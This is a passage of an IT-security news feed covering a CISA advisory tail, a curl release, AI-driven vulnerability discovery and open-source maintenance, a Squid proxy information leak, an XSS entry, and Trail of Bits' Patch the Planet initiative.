<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/918.html">CWE-918 Server-Side Request Forgery (SSRF)</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.2</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N</a></td>
</tr>
<tr>
<td>4.0</td>
<td>8.3</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N">CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<hr>
<h2>Acknowledgments</h2>
<ul>
<li>Simon Weber and Volker Schönefeld of Machine Spirits UG reported this vulnerability to CISA</li>
</ul>
<hr>
<h2>Legal Notice and Terms of Use</h2>
<p>This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy &amp; Use policy (https://www.cisa.gov/privacy-policy).</p>
<hr>
<h2>Recommended Practices</h2>
<p>CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability.</p>
<p>Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.</p>
<p>Locate control system networks and remote devices behind firewalls and isolating them from business networks.</p>
<p>When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.</p>
<p>CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.</p>
<p>CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.</p>
<p>CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.</p>
<p>Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.</p>
<p>Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.</p>
<p>CISA also recommends users take the following measures to protect themselves from social engineering attacks:</p>
<p>Do not click web links or open attachments in unsolicited email messages.</p>
<p>Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.</p>
<p>Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.</p>
<p>No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.</p>
<hr>
<h2>Revision History</h2>
<ul>
<li><strong>Initial Release Date: </strong>2026-06-25</li>
</ul>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Date</th>
<th role="columnheader">Revision</th>
<th role="columnheader">Summary</th>
</tr>
</thead>
<tbody>
<tr>
<td>2026-06-25</td>
<td>1</td>
<td>Initial Publication</td>
</tr>
</tbody>
</table>
<hr>
<h2>Legal Notice and Terms of Use</h2>]]></content:encoded>
</item>
<item>
<title><![CDATA[Curl 8.21.0 Released With 18 Security Fixes]]></title>
<description><![CDATA[The curl project has announced the release of version 8.21.0, marking its 275th release and including a significant security update. This version addresses 18 newly disclosed vulnerabilities, reflecting an unusually high volume of security reports. Project maintainer Daniel Stenberg announced…
Re...]]></description>
<link>https://tsecurity.de/de/3624272/it-security-nachrichten/curl-8210-released-with-18-security-fixes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624272/it-security-nachrichten/curl-8210-released-with-18-security-fixes/</guid>
<pubDate>Thu, 25 Jun 2026 13:23:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The curl project has announced the release of version 8.21.0, marking its 275th release and including a significant security update. This version addresses 18 newly disclosed vulnerabilities, reflecting an unusually high volume of security reports. Project maintainer Daniel Stenberg announced…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/curl-8-21-0-released-with-18-security-fixes/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/curl-8-21-0-released-with-18-security-fixes/">Curl 8.21.0 Released With 18 Security Fixes</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Curl 8.21.0 Released With 18 Security Fixes]]></title>
<description><![CDATA[The curl project has announced the release of version 8.21.0, marking its 275th release and including a significant security update. This version addresses 18 newly disclosed vulnerabilities, reflecting an unusually high volume of security reports. Project maintainer Daniel Stenberg announced on ...]]></description>
<link>https://tsecurity.de/de/3624158/it-security-nachrichten/curl-8210-released-with-18-security-fixes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624158/it-security-nachrichten/curl-8210-released-with-18-security-fixes/</guid>
<pubDate>Thu, 25 Jun 2026 12:52:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The curl project has announced the release of version 8.21.0, marking its 275th release and including a significant security update. This version addresses 18 newly disclosed vulnerabilities, reflecting an unusually high volume of security reports. Project maintainer Daniel Stenberg announced on June 24, 2026. This release sets a record for the number of vulnerabilities addressed […]</p>
<p>The post <a href="https://gbhackers.com/curl-8-21-0-released/">Curl 8.21.0 Released With 18 Security Fixes</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why your cloud strategy is already out of date]]></title>
<description><![CDATA[I’ve been watching two conversations happen in parallel for the last ~3x months, and almost nobody is connecting them. That gap is going to hurt.



The first conversation is about cloud. Enterprises everywhere are rethinking their hyperscaler dependence. Costs are spiraling out of control. AI wo...]]></description>
<link>https://tsecurity.de/de/3623891/it-security-nachrichten/why-your-cloud-strategy-is-already-out-of-date/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623891/it-security-nachrichten/why-your-cloud-strategy-is-already-out-of-date/</guid>
<pubDate>Thu, 25 Jun 2026 11:08:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>I’ve been watching two conversations happen in parallel for the last ~3x months, and almost nobody is connecting them. That gap is going to hurt.</p>



<p>The first conversation is about cloud. Enterprises everywhere are rethinking their hyperscaler dependence. Costs are spiraling out of control. AI workloads are data-sensitive, latency-hungry and expensive to run on someone else’s infrastructure. Suddenly, private clouds are back in fashion. Sovereign clouds are popping up across Europe and Asia. Neoclouds, those nimble, specialized providers, are chipping away at the dominance of AWS, Azure and GCP. The logic is sound. You want control over your costs, your data, your destiny.</p>



<p>After a decade of “just put it in the cloud,” the pendulum is swinging back. Smart move.</p>



<p>The second conversation is happening in a much smaller room. It’s about what AI is about to do to the software supply chain. <a href="https://red.anthropic.com/2026/mythos-preview/" rel="nofollow">Mythos</a> is real. I’ve seen enough to stop treating it like a thought experiment. These models are finding hundreds of vulnerabilities a night, not simple code mistakes, but novel chains of existing issues woven together into attack paths no human researcher would have mapped. It’s creative in a way that genuinely surprised me. That’s not a faster SAST scanner or a better linter. That’s a different class of threat entirely. And here’s the thing: even if you believe Mythos specifically is overhyped or a marketing play, the underlying capability is coming. It’s a when, not an if. The genie isn’t going back in the bottle.</p>



<p>Now, here’s the connection almost nobody is making: you’re replatforming for control, but the software supply chain underneath your workloads was never built for what’s about to hit it. These two trends are on a collision course, and most cloud strategy documents I see don’t mention it at all.</p>



<p>Here’s the connection nobody’s making: you’re replatforming for control, but the software supply chain underneath your workloads wasn’t built for what’s coming.</p>



<h2 class="wp-block-heading">The problem isn’t your infrastructure</h2>



<p>Your private cloud, your sovereign cloud, your carefully chosen neocloud, they all pull the same dependencies. The same open source packages. The same container images. The same long tail of libraries maintained by one or two people who fit it in on weekends and owe your enterprise absolutely nothing. That’s not a criticism of maintainers. It’s just the reality of how open-source works, and it has worked remarkably well for decades. But it was designed for a different tempo.</p>



<p>When AI starts finding vulnerabilities at an industrial scale in those deep dependency chains, your infrastructure choice doesn’t save you. The patch pipeline breaks regardless of where the servers live. It doesn’t matter if you’re running on bare metal in a Frankfurt data center or in a regulated government cloud in Singapore. The vulnerability is inside the container. It’s baked into the base image. It’s three layers down in a logging library that got pulled in transitively six months ago, and nobody on your team even knows it’s there.</p>



<p>We designed coordinated vulnerability disclosure for a world where finding a critical bug was rare, expensive and slow. A skilled researcher might spend weeks reverse-engineering something to find one really good vulnerability. They’d notify the maintainer. The maintainer would have time to triage, develop a patch, test it and publish it. The downstream ecosystem would pick it up over days or weeks. The whole rhythm assumed that the finding was the bottleneck. It’s not anymore. Now the finding is instantaneous and high-volume. The bottleneck has shifted entirely to the human side, the maintainer’s attention, the review process, the patching cadence, the downstream adoption. That pipeline doesn’t scale. It was never going to.</p>



<p>And we’re already seeing the early signs of strain. Maintainers are drowning in automated vulnerability reports and AI-generated noise. Security scanners fire off tickets for everything, with no triage, no context, no prioritization. The signal-to-noise ratio is terrible. Now imagine layering on hundreds of real, weaponizable CVEs discovered by a model that works overnight. The maintainer burns out. The patch doesn’t come. The downstream is exposed. Multiply that by thousands of projects across the long tail of open source, and you start to see the shape of the problem.</p>



<h2 class="wp-block-heading">What I think actually happen</h2>



<p>Two things need to be true at the same time, and neither of them is comfortable.</p>



<ol start="1" class="wp-block-list">
<li><strong>We need coordinated disclosure that actually works at scale.</strong> Not the fragmented mess we have today. Not a dozen competing groups, each with their own reporting format, their own severity ratings, their own urgency theatrics. One trusted pipeline. One place where vetted, verified, actionable reports land in a maintainer’s inbox with everything they need to act. Maintainers need to know that if they see a report from this pipeline, it’s real, it’s urgent and it comes with a tested fix. That’s the only way to cut through the noise. This isn’t a technical problem as much as it’s a coordination and trust problem. And it’s solvable if we have the will to stop competing and start cooperating.<br><br></li>



<li>And this is the part that makes people uncomfortable: <strong>We need a maintainer of last resort.</strong> I’m not saying this lightly. Some projects won’t patch. Some can’t, the maintainer is gone, the repo is abandoned, the original author is unreachable. Some maintainers will respond but won’t be able to ship a fix in the timeframe that matters. In every one of those cases, the downstream is left holding the risk with no recourse. Open source has always had a mechanism for exactly this situation: the fork. You take the project, you assume stewardship and you keep it alive independently. That’s not a violation of open-source principles. It is the principle. It’s the escape hatch that ensures no single maintainer becomes a permanent single point of failure for the entire ecosystem.</li>
</ol>



<p>If we don’t build both of these things, the coordinated pipeline and the last-resort stewardship, the default outcome is chaos. Every major cloud provider will fork its own versions of critical libraries. Security vendors will ship competing forks of the same logging framework, the same serialization library, the same crypto wrapper. Your team will be left trying to figure out which fork has which CVE fixed, whether the fix itself introduces new issues and whether the fork is even maintained anymore. That’s not a theoretical nightmare. That’s the logical endpoint of doing nothing, and we’re already seeing early signs of it.</p>



<h2 class="wp-block-heading">What if I’m asking the wrong question?</h2>



<p>If I’m advising a customer right now, and I have these conversations every week, I tell them three things.</p>



<p>One, your cloud strategy needs a supply chain strategy baked in from the start. Not bolted on later as a compliance checkbox. If you’re replatforming to a sovereign cloud or a private hyperscaler or a neocloud, you’re bringing your dependencies with you. Understand what’s in your containers. Know your SBOM not as a document you generate for an audit, but as a living inventory you can query when something breaks. If you don’t know what’s in your stack, you can’t fix it.</p>



<p>Two, ask your vendors the hard question: what’s your Plan B when a critical dependency doesn’t get patched? Not if. When. Look for vendors who have thought about this, who have a strategy for maintaining forks, who participate in the ecosystem’s security efforts rather than just consuming and complaining. The ones who shrug or change the subject are telling you something important about how they’ll handle the next Log4j moment, except the next one might not be a single high-profile library. It might be fifty libraries simultaneously, across your entire stack.</p>



<p>Three, start building internal muscle for this now. That means having people who understand your dependency graph deeply enough to make tough calls about when to wait for an upstream patch and when to fork and maintain yourself. It means having the CI/CD infrastructure to ship fixes fast without breaking things. It means training your incident response teams to think about supply chain compromises, not just infrastructure attacks. The skills and processes you need are different from what most organizations have today.</p>



<h2 class="wp-block-heading">The hard fork</h2>



<p>There’s a version of this story where we get it right. Where the ecosystem comes together, builds the disclosure pipeline, funds the maintainer of last resort and creates a model that actually works for the AI era. I genuinely believe that’s possible. Open source has survived existential threats before. It adapts precisely because it’s decentralized, because anyone can fork, because the license guarantees the right to pick up where someone else left off.</p>



<p>But this time the clock is ticking faster. The same models that are going to stress-test our dependencies are the ones that can help us defend them. The question is whether we organize ourselves in time, or whether we wait for a crisis that forces everyone into their corners, forking in isolation, burning trust and learning the hard way what coordination could have prevented.</p>



<p>Your cloud strategy document probably has a section on disaster recovery. It probably covers what happens when a region goes down, when a provider has an outage, when a certificate expires. Does it cover what happens when a library four layers deep in your container image is discovered to have a critical vulnerability, and the maintainer hasn’t been seen on GitHub in eight months?</p>



<p>If it doesn’t, now is the time to write that section. Because that scenario isn’t hypothetical anymore. It’s just a matter of when.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[So you've become a FOSS-Maintainer - Lessons learned from ~6 years of maintaining HedgeDoc (gpn24)]]></title>
<description><![CDATA[Erik and Molly (among others) became HedgeDoc maintainers during the pandemic. They started a complete rewrite of the project almost immediately and learned FOSS maintenance the hard way. In this talk they'll present some lessons learned, so that others might have a better starting point.

Now th...]]></description>
<link>https://tsecurity.de/de/3622525/it-security-video/so-youve-become-a-foss-maintainer-lessons-learned-from-6-years-of-maintaining-hedgedoc-gpn24/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622525/it-security-video/so-youve-become-a-foss-maintainer-lessons-learned-from-6-years-of-maintaining-hedgedoc-gpn24/</guid>
<pubDate>Wed, 24 Jun 2026 20:49:36 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Erik and Molly (among others) became HedgeDoc maintainers during the pandemic. They started a complete rewrite of the project almost immediately and learned FOSS maintenance the hard way. In this talk they'll present some lessons learned, so that others might have a better starting point.

Now that you are a FOSS maintainer (or are aiming to become one) several questions might come to your mind.

- What's maintaining like?
- What can I do to make my life easier?
- How do I manage the community?
- How do I keep the motivation high?
- How can I prevent burnout?
- What's the important stuff that suddenly needs to be handled?

We were at the same point, but after six years continuous maintenance of a reasonably big FOSS project, we've come to some answers that we'd like to share with you. Expect some honest answers, funny anecdotes and hard learned lessons.

Licensed to the public under https://creativecommons.org/licenses/by/4.0/
about this event: https://cfp.gulas.ch/gpn24/talk/V9WEYQ/]]></content:encoded>
</item>
<item>
<title><![CDATA[Open source grapples with agentic coding]]></title>
<description><![CDATA[Unless you’ve been living under an old woodpile in your backyard, you have certainly seen how agentic coding is rocking the software development world. Things are happening fast and furious, and keeping up is practically a full-time job. 



The latest area that is catching the attention of devel...]]></description>
<link>https://tsecurity.de/de/3620720/ai-nachrichten/open-source-grapples-with-agentic-coding/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620720/ai-nachrichten/open-source-grapples-with-agentic-coding/</guid>
<pubDate>Wed, 24 Jun 2026 11:03:53 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Unless you’ve been living under an old woodpile in your backyard, you have certainly seen how agentic coding is rocking the software development world. Things are happening fast and furious, and keeping up is practically a full-time job. </p>



<p>The latest area that is catching the attention of developers is how agentic coding is affecting the open source community. The <a href="https://www.infoworld.com/article/2262355/what-is-open-source-software-open-source-and-foss-explained.html" data-type="link" data-id="https://www.infoworld.com/article/2262355/what-is-open-source-software-open-source-and-foss-explained.html">open source movement</a> has been defending the rights of folks to use, change, and contribute to software for many years. And of course, agentic coding is starting to become part of that process.</p>



<p>On the one hand, maintainers of open source projects rightfully are frustrated as they become overwhelmed with pull requests of dubious quality and usefulness being submitted by coding agents. On the other hand, <a href="https://world.hey.com/dhh/let-the-agents-democratize-open-source-9fd630a9">as David Heinemeier Hansson notes</a>, maintainers are starting to get a little snooty about accepting AI-written code, viewing it as somehow not worthy of being included. Some organizations have explicitly <a href="https://x.com/LundukeJournal/status/2060344714432241990?s=20" data-type="link" data-id="https://x.com/LundukeJournal/status/2060344714432241990?s=20">banned AI-generated submissions</a>.</p>



<p>I get that they don’t want AI slop overwhelming their input queues. But I think it is a huge mistake to ban AI-written code outright.</p>



<h2 class="wp-block-heading">Whose code?</h2>



<p>Before I dig deeper into that notion, it’s important to look at another issue that arises from all of this: Who actually owns the code that AI writes? </p>



<p>Copyright requires that a human produce the thing being copyrighted. If you prompt Claude Code with “Write me a CMS system” and then Claude writes you a CMS system that you check into a public GitHub repository unchanged, it’s not quite clear if that code is protected by copyright. However, if you prompt Claude Code with a specification and guidelines and then you work with Claude to refine the initial result, reviewing the code and making changes as part of an iterative process, then it could be argued that a human did produce that code. But it is not at all <a href="https://legallayer.substack.com/p/who-owns-the-claude-code-wrote">clear-cut legally</a>. (Please note that I am not a lawyer.)</p>



<p>The current thinking is that the result of accepting verbatim the output of a simple prompt is not copyrightable, and that no one actually owns the code — an interesting notion in and of itself. </p>



<p>But then the ethical question comes into play. If I find a bug in an open source project, I ask GitHub Copilot to fix it, and Copilot writes a clever and effective fix, then who cares who owns the code? Should a maintainer of the project reject such a pull request just because it was AI-generated? That seems silly to me, yet it is happening today. </p>



<h2 class="wp-block-heading">Our code</h2>



<p>There is, too, the issue of license compliance for AI-generated code. As a general rule, LLMs generate code rather than copying it. They don’t copy and paste code directly from repositories. However, there have been cases where AI-produced code has resembled open source code so closely that the claim could be made that it is a copy. If this happens with <a href="https://opensource.org/license/gpl-3.0">GPL</a> code, it could be a violation of the license to use it without the receiving code base being “infected.” Open source maintainers naturally should be concerned about this happening.</p>



<p>In the end, an open source maintainer should care about the quality and license compliance of submissions, not how those submissions were derived. Gatekeeping based on the source of code doesn’t seem like a good path towards project success. Good code is good code, no matter where it comes from.</p>



<p>Agentic coding is here, and the open source community needs to realize — and embrace — that inevitability.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Demystifying StartupWMClass :: Terminal Thoughts]]></title>
<description><![CDATA[As the maintainer of Plank Reloaded, the most common bug report I get is "this app has the wrong icon." It's almost never the dock, it's a broken StartupWMClass in the app's .desktop file. So I wrote up how to find the right value on X11, Wayland, and KDE, and why deleting the line often fixes it...]]></description>
<link>https://tsecurity.de/de/3620068/linux-tipps/demystifying-startupwmclass-terminal-thoughts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620068/linux-tipps/demystifying-startupwmclass-terminal-thoughts/</guid>
<pubDate>Wed, 24 Jun 2026 04:40:03 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>As the maintainer of Plank Reloaded, the most common bug report I get is "this app has the wrong icon." It's almost never the dock, it's a broken StartupWMClass in the app's .desktop file. So I wrote up how to find the right value on X11, Wayland, and KDE, and why deleting the line often fixes it.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/zquestz"> /u/zquestz </a> <br> <span><a href="https://thoughts.greyh.at/posts/startup-wm-class/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1udycay/demystifying_startupwmclass_terminal_thoughts/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[29-Year-Old Squid Proxy Bug 'Squidbleed' Can Leak Cleartext HTTP Requests]]></title>
<description><![CDATA[A 29-year-old bug in the Squid web proxy, dubbed Squidbleed and tracked as CVE-2026-47729, can let an authorized proxy user retrieve fragments of another user's cleartext HTTP requests, including credentials and session tokens. The security researcher who reported the flaw credited Anthropic's Cl...]]></description>
<link>https://tsecurity.de/de/3619846/it-security-nachrichten/29-year-old-squid-proxy-bug-squidbleed-can-leak-cleartext-http-requests/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3619846/it-security-nachrichten/29-year-old-squid-proxy-bug-squidbleed-can-leak-cleartext-http-requests/</guid>
<pubDate>Wed, 24 Jun 2026 01:08:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A 29-year-old bug in the Squid web proxy, dubbed Squidbleed and tracked as CVE-2026-47729, can let an authorized proxy user retrieve fragments of another user's cleartext HTTP requests, including credentials and session tokens. The security researcher who reported the flaw credited Anthropic's Claude Mythos Preview for the discovery. The Hacker News reports: Squid describes this as an attack by a trusted client: someone already permitted to use the proxy, not any random host on the internet. That matches Squid's usual home, shared networks like schools, offices, and public Wi-Fi. In those setups, the attacker is just another user of the same proxy. The leak also only reaches traffic that Squid can read. Normal HTTPS rides an opaque CONNECT tunnel, so Squid never sees inside it; the exposed traffic is cleartext HTTP, plus TLS-terminating setups where Squid decrypts and inspects. The attacker also needs the proxy to reach an FTP server they control on port 21. Both FTP and that port are on by default.
 
[...] If you patch, verify the fix, not just the version. Confirm the guard is in FtpGateway.cc, or check your distribution's backport, since distros ship their own builds (Debian packages Squid 5.7). The public thread is still inconsistent: maintainer Amos Jeffries first said Squid 7.6 carried the fix, then corrected that to 7.7, and on June 22 Debian's Salvatore Bonaccorso noted the referenced commit looks like it is already in 7.6. The fix is small, a null-terminator check before the vulnerable strchr calls, merged to the development branch in April and v7 in May. Squid 7.6 does separately patch CVE-2026-50012, an unrelated cache_digest heap overflow.
 
The cleaner move is the one the researchers recommend anyway: turn FTP off. Chromium dropped FTP years ago, and most networks carry almost none of it, so disabling it removes this attack surface for free, whatever build you run. The risk is real but bounded. SUSE rates it moderate, CVSS 6.5, and the vector explains the score: the attacker needs proxy access (low privileges), and the only impact is confidentiality, nothing on integrity or availability.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=29-Year-Old+Squid+Proxy+Bug+'Squidbleed'+Can+Leak+Cleartext+HTTP+Requests%3A+https%3A%2F%2Fit.slashdot.org%2Fstory%2F26%2F06%2F23%2F2025211%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fit.slashdot.org%2Fstory%2F26%2F06%2F23%2F2025211%2F29-year-old-squid-proxy-bug-squidbleed-can-leak-cleartext-http-requests%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://it.slashdot.org/story/26/06/23/2025211/29-year-old-squid-proxy-bug-squidbleed-can-leak-cleartext-http-requests?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-11772 | DRIMO CMS up to 1.0 info.php searching q cross site scripting (EUVD-2026-38450)]]></title>
<description><![CDATA[A vulnerability classified as problematic has been found in DRIMO CMS up to 1.0. This vulnerability affects the function searching of the file info.php. Performing a manipulation of the argument q results in cross site scripting. This vulnerability only affects products that are no longer support...]]></description>
<link>https://tsecurity.de/de/3618926/sicherheitsluecken/cve-2026-11772-drimo-cms-up-to-10-infophp-searching-q-cross-site-scripting-euvd-2026-38450/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3618926/sicherheitsluecken/cve-2026-11772-drimo-cms-up-to-10-infophp-searching-q-cross-site-scripting-euvd-2026-38450/</guid>
<pubDate>Tue, 23 Jun 2026 18:27:26 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/drimo:cms">DRIMO CMS up to 1.0</a>. This vulnerability affects the function <code>searching</code> of the file <em>info.php</em>. Performing a manipulation of the argument <em>q</em> results in cross site scripting. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-11772">CVE-2026-11772</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[Introducing Patch the Planet]]></title>
<description><![CDATA[What happens when you clear dozens of Trail of Bits engineers’ schedules, pair them with every open-source maintainer they can contact, and unleash the latest frontier models like GPT-5.5-Cyber on critical open-source targets? Thanks to our partnership with OpenAI and its Daybreak initiative, we ...]]></description>
<link>https://tsecurity.de/de/3616197/it-security-nachrichten/introducing-patch-the-planet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616197/it-security-nachrichten/introducing-patch-the-planet/</guid>
<pubDate>Mon, 22 Jun 2026 19:09:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>What happens when you clear dozens of Trail of Bits engineers’ schedules, pair them with every open-source maintainer they can contact, and unleash the latest frontier models like GPT-5.5-Cyber on critical open-source targets? Thanks to <a href="https://openai.com/index/daybreak-securing-the-world/">our partnership with OpenAI</a> and its Daybreak initiative, <a href="https://gist.github.com/patch-the-planet/69fd1aa925c8e73edea9e6e967043cbb">we can report</a> that the impact is hundreds of discovered bugs, 64 pull requests, and 51 issues filed across 19 projects (with many more still undergoing coordinated disclosure). That was just the first week of <a href="https://trailofbits.com/patch-the-planet">Patch the Planet</a>.</p>
<p>Frontier models like GPT-5.5-Cyber are producing a firehose of security findings, and already-stretched maintainers must sift through all of it to separate real vulnerabilities from plausible-sounding false positives. Patch the Planet is different: with our experts orchestrating and triaging findings, we handle the work of fixing and hardening the code alongside the people who maintain it.</p>
<p>The first week of Patch the Planet covered 19 projects across cryptography, networking, language infrastructure, and software supply chain. Among these 19 projects were cURL, NATS, pyca, Sigstore, aiohttp, the Go project, freenginx, Python and python.org, urllib3, PyPI, SimpleX, Valkey, and RustCrypto. Over 30 projects have joined the initiative so far, and we’re rapidly expanding it to include more; if you maintain an open-source project, <a href="https://trailofbits.com/patch-the-planet">apply to join</a>!</p>
<p>




 

 






 <figure>
 
 <img src="https://blog.trailofbits.com/2026/06/22/introducing-patch-the-planet/ptp-image-1.gif" alt="“Live look at the Trail of Bits engineering teams”" width="500" height="221" loading="lazy" decoding="async">
 <figcaption>Live look at the Trail of Bits engineering teams</figcaption>
 </figure>
</p>
<p>Anyone can file an issue, flex, and walk away. We showed up with the patches: 37 are already merged, and many more are in flight. These merges go beyond just fixing bugs: we’re adding new tests and fuzzing harnesses, CI security scanning, supply-chain tooling, correctness fixes, and features maintainers had been meaning to get to. The goal of Patch the Planet is to leave essential open-source projects measurably better off.</p>
<h2>We brought patches, not just bug reports</h2>
<p>We’re reporting public findings <a href="https://gist.github.com/patch-the-planet/69fd1aa925c8e73edea9e6e967043cbb">on GitHub</a>, including 64 total pull requests. We also filed 51 issues, 19 of which are already closed with a fix. This public tally undercounts the work, since several projects take reports through private channels like HackerOne, GitHub security advisories, mailing lists, and private forks, and most of these have not been released publicly yet.</p>
<p>What’s in those pull requests matters more than the count. At python.org, we added a CI workflow built on <a href="https://github.com/zizmorcore/zizmor">zizmor</a>, our open-source GitHub Actions auditor, fixed all of the issues it flagged, and integrated it into their CI. In RustCrypto, we contributed correctness fixes to the big-integer library that higher-level cryptography is built on, alongside genuine feature work in review: serde encoding support and HPKE DHKEM suite IDs. Other patches were plain engineering help: storage-accounting and service-restart fixes in SimpleX, a clearer admin-quarantine confirmation in PyPI’s Warehouse, and supply-chain improvements like SBOM sidecars for Python’s Windows artifacts. We will also be upstreaming many testing improvements and new testing campaigns. Arguably, our best contributions are not even bug or security fixes.</p>
<p>Keeping track of all of this is a bot we call Patchy. Patchy monitors every project, posts each new finding and merged patch to our Slack, and, for reasons we consider scientifically sound, reintroduces the common use of <a href="https://openai.com/index/where-the-goblins-came-from/">goblins, gremlins, and assorted creatures</a>. Here’s Patchy’s description of <a href="https://github.com/pyca/cryptography/pull/14933">an issue that has been patched</a>:</p>
<p>




 

 




 


 <figure>
 <img src="https://blog.trailofbits.com/2026/06/22/introducing-patch-the-planet/ptp-image-2_hu_d772e23377508832.webp" alt="“Patchy’s description of an issue that has been patched”" width="1200" height="329" loading="lazy" decoding="async">
 <figcaption>Patchy’s description of an issue that has been patched</figcaption>
 </figure>
</p>
<p>When a patch lands, Patchy celebrates with a triumphant <code>PATCHY HAPPY</code>. Making Patchy happy is really what drives us.</p>
<p>




 

 




 


 <figure>
 <img src="https://blog.trailofbits.com/2026/06/22/introducing-patch-the-planet/ptp-image-3_hu_5af72ac2534386fd.webp" alt="“Bug patched, Patchy happy”" width="1200" height="185" loading="lazy" decoding="async">
 <figcaption>Bug patched, Patchy happy</figcaption>
 </figure>
</p>
